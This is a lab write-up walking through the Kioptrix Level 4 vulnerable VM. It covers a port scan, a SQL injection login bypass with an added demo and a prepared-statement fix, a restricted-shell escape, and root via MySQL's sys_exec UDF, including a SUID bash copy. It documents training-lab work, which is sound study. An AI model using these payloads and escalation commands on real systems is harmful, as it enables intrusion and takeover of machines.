[writeup] Kioptrix Level 4 VM
- Preface
- Walkthrough
- nmap scan
- dirsearch web directory scan
- Samba scan
- SQL injection
- SSH login as john
- Privilege escalation via MySQL UDF
- Summary
Preface
Target VM: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
Kali attacker IP: 192.168.119.134
Target IP: 192.168.119.138
Walkthrough
nmap scan
First run an nmap ping sweep to find the target; it answers at 192.168.119.138. A full port scan with service and OS detection then shows three services, all old versions on an Ubuntu host: HTTP (Apache 2.2.8 with PHP 5.2.4), SSH (OpenSSH 4.7p1) and SMB (Samba 3.0.28a).
root@ian:~# nmap -sn 192.168.119.0/24
...
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-22 10:58 CST
Nmap scan report for 192.168.119.138
Host is up (0.00016s latency).
MAC Address: 00:0C:29:71:D6:25 (VMware)
...
Nmap scan report for 192.168.119.134
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.03 seconds
root@ian:~# nmap -sS -T4 -p- -A 192.168.119.138
......
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:71:D6:25 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m02s, deviation: 2h49m43s, median: 1s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2020-09-21T23:01:04-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
......
dirsearch web directory scan
Port 80 is open, so the first step is a dirsearch scan of the site. Two interesting paths come back: checklogin.php and database.sql. database.sql is a SQL dump: it creates the members table and inserts a john account with the password 1234.
That username and password do not log in through checklogin.php, though; it reports a wrong username/password. It is unclear whether john was never created or the password was changed later.
Samba scan
enum4linux and smbmap (I am not yet very practised with this part).
SQL injection
The HTTP service is a site with nothing but a login form. (sqlmap did not find anything, but manual testing shows the password field is injectable.)
Logging in with an authentication-bypass payload (a "universal password") works, which confirms the injection.
A successful login redirects to members.php. With admin and root the result is the same message; with the john user found earlier it works. This confirms that john exists and also reveals the password, which members.php displays:
Username : john
Password : MyNameIsJohn
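To make the injection concrete, here is an added example (not from the original writeup) that can be run in any MySQL client. It assumes checklogin.php builds its query by concatenating the two form fields, as SELECT * FROM members WHERE username='$u' AND password='$p'; that form is an assumption, not something the writeup quotes. The table layout follows the columns database.sql creates, and the single row uses the credentials recovered above. The ' OR 1=1 # payload is the usual auth-bypass string and is likewise assumed, since the writeup does not print the one it used.

```sql
-- Added example: why an OR-true payload in the password field bypasses the login,
-- and how a bound parameter stops it. Table layout mirrors database.sql on the
-- target; the row holds the credentials recovered in the writeup.
CREATE TEMPORARY TABLE members (
  id       INT AUTO_INCREMENT PRIMARY KEY,
  username VARCHAR(65) NOT NULL,
  password VARCHAR(65) NOT NULL
);
INSERT INTO members (username, password) VALUES ('john', 'MyNameIsJohn');

-- 1. Legitimate lookup: a row comes back only when both values match.
SELECT username, password FROM members
 WHERE username = 'john' AND password = 'wrong';
-- Empty set

-- 2. The same statement after the application splices the payload
--      ' OR 1=1 #
--    into the password field (assumed query shape). AND binds tighter than OR,
--    so the WHERE clause is (username='john' AND password='') OR 1=1, and the
--    '#' comments out the application's closing quote. john's row comes back
--    and members.php prints its password column. With a username that does not
--    exist, the OR-true clause returns every row instead.
--    The ';' sits on its own line because '#' comments out the rest of the line.
SELECT username, password FROM members
 WHERE username = 'john' AND password = '' OR 1=1 #'
;
-- john | MyNameIsJohn

-- 3. The fix: bind the input instead of interpolating it. The identical payload
--    is compared as a literal string and matches nothing.
PREPARE stmt FROM
  'SELECT username, password FROM members WHERE username = ? AND password = ?';
SET @u = 'john';
SET @p = ''' OR 1=1 #';   -- the literal string:  ' OR 1=1 #
EXECUTE stmt USING @u, @p;
-- Empty set
DEALLOCATE PREPARE stmt;
DROP TEMPORARY TABLE members;
```

In PHP the equivalent of step 3 is a prepared statement with bound parameters (mysqli or PDO); escaping alone is the wrong tool, and the mysql_* functions the page's PHP 5.2 code uses offer no binding at all.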
SSH login as john
root@ian:/# ssh john@192.168.119.138
john@192.168.119.138's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd clear echo exit help ll lpath ls
john:~$ lpath
Allowed:/home/john
john's account is locked down: only a handful of commands are allowed and the reachable directory is limited to /home/john. Among the allowed commands, echo can be abused to call os.system() with /bin/bash, which breaks out of the restricted shell. After the escape, sudo -l shows no extra privileges.
john:~$ echo os.system('/bin/bash')
External references:
Techniques for bypassing restricted Linux shells
ex16x41
Next, look for exploitable SUID binaries. There are published privilege-escalation methods for the ping binary, but john is not allowed to use gcc on this target, so the payload cannot be compiled. No way to build it was found for now, so this route is skipped.
find / -perm -4000 2>/dev/null
Privilege escalation via MySQL UDF
In the end, after looking up approaches online, the way in is back through the website: escalate via MySQL.
checklogin.php shows that the MySQL root user has no password, so MySQL can be accessed directly as root and the escalation done from inside MySQL.
john@Kioptrix4:/var/www/john$ cat /var/www/checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password -- empty here, so the MySQL root account has no password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
Connect to MySQL as root. Querying the UDF table (mysql.func) shows a sys_exec function, which runs operating-system commands. Use sys_exec to add john to the admin group; on Ubuntu that group is granted full sudo by the default sudoers file. Note that sys_exec returns NULL in this session rather than the command's exit status, so the effect has to be verified directly (the subsequent sudo su succeeding shows it worked, and since usermod needs root, it also shows that mysqld itself runs as root).
mysql> SELECT * FROM mysql.func;
+-----------------------+-----+---------------------+----------+
| name | ret | dl | type |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function |
| sys_exec | 0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)

mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL |
+--------------------------------------+
1 row in set (0.04 sec)
john@Kioptrix4:/var/www/john$ sudo su
[sudo] password for john:
root@Kioptrix4:/var/www/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/var/www/john# cat /root/congrats.txt
Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret
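The checks a practitioner would run before relying on a pre-installed UDF, plus the escalation itself, as an added example (not from the original writeup). It assumes the mysql client is started on the target as root with the empty password shown in checklogin.php. The mysql.func table, the sys_exec function and the usermod command come from the writeup; the /tmp paths, the column name mysql.user.password (valid for the MySQL 5.0 on this box, renamed authentication_string in 5.7+), the admin sudo group and the SUID-shell alternative are assumptions based on Ubuntu 8.04 defaults.

```sql
-- Added example: verify the preconditions of UDF privilege escalation, then escalate.
-- Run as:  mysql -u root   (empty password, per checklogin.php)

-- 1. Who are we inside MySQL, and what build is this?
SELECT USER(), CURRENT_USER(), @@version, @@version_compile_os;

-- 2. Confirm root really has an empty password and from which hosts it may connect.
--    (column is `password` on MySQL 5.0; `authentication_string` on 5.7 and later)
SELECT user, host, password FROM mysql.user WHERE user = 'root';

-- 3. Which UDFs are already registered? lib_mysqludf_sys is the interesting one.
--    ret encodes the declared return type: 0 = STRING, 1 = REAL, 2 = INTEGER.
SELECT name, ret, dl, type FROM mysql.func;

-- 4. Under which OS account does mysqld run? sys_exec normally returns the
--    command's exit status (NULL in the writeup's session), never its output, so
--    write the output to a file and read it back with LOAD_FILE. LOAD_FILE needs
--    the FILE privilege (root has it); if it returns NULL, check @@secure_file_priv.
SELECT sys_exec('id > /tmp/mysql_id.txt 2>&1');
SELECT LOAD_FILE('/tmp/mysql_id.txt');
-- On this box: uid=0(root) ... . If mysqld ran as an unprivileged 'mysql' user,
-- sys_exec would only give code execution as that user, not root.

-- 5. The writeup's route: add john to the admin group, which Ubuntu's default
--    /etc/sudoers grants full sudo ("%admin ALL=(ALL) ALL"). Verify by effect.
SELECT sys_exec('usermod -a -G admin john');
SELECT LOAD_FILE('/etc/group');       -- expect a line like admin:x:...:john

-- 6. Alternative that does not depend on sudoers (assumed, not from the writeup):
--    drop a SUID copy of bash. From john's shell, /tmp/rootbash -p then gives
--    euid 0 (-p stops bash from dropping the effective uid).
SELECT sys_exec('cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash');

-- 7. Remove what was left on disk once done.
SELECT sys_exec('rm -f /tmp/mysql_id.txt');
```

Two things make this path work here and would not hold on a hardened host: the MySQL root account has no password and is reachable from a local shell, and mysqld runs as root, so anything sys_exec executes inherits uid 0. Either a password on root or running mysqld as the unprivileged mysql user would have stopped it, and a server without lib_mysqludf_sys already installed would additionally require writing the shared object into a directory the server loads libraries from.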
Summary
1. Write up common Samba enumeration techniques (enum4linux and smbmap)
2. Write up MySQL UDF privilege escalation
3. Go through common privilege-escalation techniques
(links to be added once these are written)